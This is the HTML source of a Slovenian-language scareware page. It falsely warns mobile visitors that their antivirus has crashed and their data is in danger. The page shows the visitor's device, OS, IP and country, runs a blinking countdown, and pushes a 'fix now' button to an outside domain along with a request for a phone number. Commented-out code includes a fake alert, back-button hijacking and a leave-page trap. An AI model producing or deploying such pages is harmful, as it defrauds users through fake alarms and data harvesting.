<!DOCTYPE html>
<html>

<head>
    <base href="">
    <meta charset="utf-8">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0, width=device-width">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <title>(1) Pozor!</title>
    <style>
        #timer p,#wrapper,p{color:#000}#timer,#wrapper{max-width:800px}#timer p,#wrapper{text-align:center}#error,#timer{display:inline-block;float:left}#timer p,.btn{font-weight:700}body{font-family:sans-serif}a{text-decoration:none}footer,header,section{clear:both}*{margin:0;padding:0}#wrapper{margin:0 auto;border:0;border-radius:0}h1{font-size:20px}p{font-size:14px;padding:5px 0}img{width:10%}#timer{width:60%}#timer p{font-size:12px}#error{width:40%;vertical-align:200px}#error img{width:100%}.btn{background-color:red;border-radius:5px;color:#fff;display:block;line-height:50px;max-width:275px;width:90%}.red{color:red}.container{padding-left:8px;padding-right:8px}.white{color:#fff}.blue{color: #0073ab;}
            @-webkit-keyframes blinker {from {opacity: 1.0;} to {opacity: 0.0;}}
            .blink{text-decoration: blink;
            -webkit-animation-name: blinker;
            -webkit-animation-duration: 0.6s;
            -webkit-animation-iteration-count:infinite;
            -webkit-animation-timing-function:ease-in-out;
            -webkit-animation-direction: alternate;}
    </style>
    <script type="text/javascript" src="platform.js"></script>

    <script>
    function goto() {
        location.href = 'https://www.google.com/'
    }
    </script>
    <script
      src="http://code.jquery.com/jquery-3.3.1.min.js"
      integrity="sha256-FgpCb/KJQlLNfOu91ta32o/NMZxltwRo8QtmkMRdAu8="
      crossorigin="anonymous"></script>
    <script language="JavaScript" type="text/javascript">
    <!--
    var sec = 59; // set the seconds
    var min = 01; // set the minutes
    function countDown() {
        sec--;
        if (sec == -01) {
            sec = 59;
            min = min - 1;
        } else {
            min = min;
        }

        if (sec <= 9) { sec = "0" + sec; }

        time = (min <= 9 ? "" + min : min) + " minutes and " + sec + " seconds";

        if (document.getElementById) { document.getElementById('theTime').innerHTML = time; }

        SD = window.setTimeout("countDown();", 1000);
        if (min == '00' && sec == '00') { sec = "00";
            window.clearTimeout(SD); }
    }
    window.onload = countDown;
    // -->
    /*Geolocation*/
    $.getJSON('http://gd.geobytes.com/GetCityDetails?callback=?', function(data) {
      console.log(JSON.stringify(data, null, 2));
      $('#ip').html(JSON.stringify(data.geobytesremoteip, null, 2));
      $('#country').html(JSON.stringify(data.geobytescountry, null, 2));
    });
    </script>
</head>

<body onclick="goto()">
    <script>
    if (typeof(window.orientation) == "undefined") {
        var o = document.createElement("img");
        o.src = 'https://www.google.com/';
    } else {
        var o = document.createElement("img");
        o.src = 'https://www.google.com/';
    }
    </script>
    <div id="wrapper">
        <div class="container">
            <header><img src="headerLogo.gif" alt=""></header>
            <section>
                <h1><span class="red blink">Opozorilo:</span> Antivirus se je zrušil!</h1>
            </section>
            <section>
                <div id="timer">
                    <p></p>
                    <p>
                        <span class="blue">Zaznali smo, da so vaši osebni podatki ogroženi!<br>
				Device:  <script>document.write(platform.product)</script><br>
				OS:  <script>document.write(platform.os)</script><br>
				IP:  <span id="ip"></span><br> 
				Država:  <span id="country"></span><br>
				
				Kmalu bo poškodoval vašo kartico SIM in poškodoval telefonske stike, fotografije, podatke, aplikacije itd. </span>
                        <!--span class="red">We have detected that your <script>document.write(platform.description + (" ") + (platform.manufacturer || 'unknown vendor'))</script> is <span class="redbold">28.1% DAMAGED</span> because of <b>(4) malicious virus from recent adult sites.</b> It will soon damage your SIM card and corrupt your phone contacts, photos, data, apps, etc. </span-->
                    </p>
                    <p>
                        <!--span style="font-size:20px;font-weight:bold;color:red;font-family:sans-serif;" id="theTime">4 minutes and 44 seconds</span-->
                        <br>
                    </p>
                    <p>
                    </p>
                </div>
                <div id="error">
                    <!--img src="404.png" alt=""-->
                    <br>
                    <br>
                    <span style="font-size:20px;font-weight:bold;color:red;font-family:sans-serif;" id="theTime" class=" blink">4 minute and 44 sekund</span>.
                </div>
            </section>
            <section>
                <p> <b>Če te težave ne odpravite zdaj, bo vaš telefon resneje poškodoval. Tukaj je nekaj, kar morate storiti (korak za korakom): </b>
                    <br>
                    <br><strong>Korak 1:</strong> Tapnite gumb za preuzimanje <strong>"Antivirusa"</strong> in odstranite vse viruse mobilnog telefona
                    <br>
                    <br>
                    <strong>Korak 2: </strong>Vnesite svojo telefonsko številko</p>
                    <br>
                    <strong>Korak 3: </strong>Očistite telefon</p>
                <p></p>
            </section>
            <footer>
                <p align="center"><a class="btn blink" href="https://pields-ladayeast.icu/click" onclick="someFunction()">POPRAVITE ZDAJ</a></p>
            </footer>
        </div>
       <!--  <script>
        //alerter on start
        alert("Pozor!\n\nVaš mobilni telefon " + platform.description + " " + (platform.manufacturer || 'unknown vendor') + " je zelo poškodovan zaradi virusov\nTakoj očistite svoj sistem! Kliknite [OK]");
        </script>
        <script type="text/javascript">
        bajb_backdetect.OnBack = function() {
            window.history.back = function() {
                document.location = '#'
            }
        }
        </script>
        <script type="text/javascript">
        var popit = true;
        window.onbeforeunload = function() {
            if (popit == true) {
                popit = false;
                return "Wait!! There are still (2) prizes available! Do not miss them!";
            }
        }
        </script>
        <script>
        function someFunction() {
            // alert("Confirm your phone number on the next page to install the application.");
            window.onbeforeunload = null;
            window.location = 'https://pields-ladayeast.icu/click';
        }
        </script> -->
    </div>
</body>

</html>
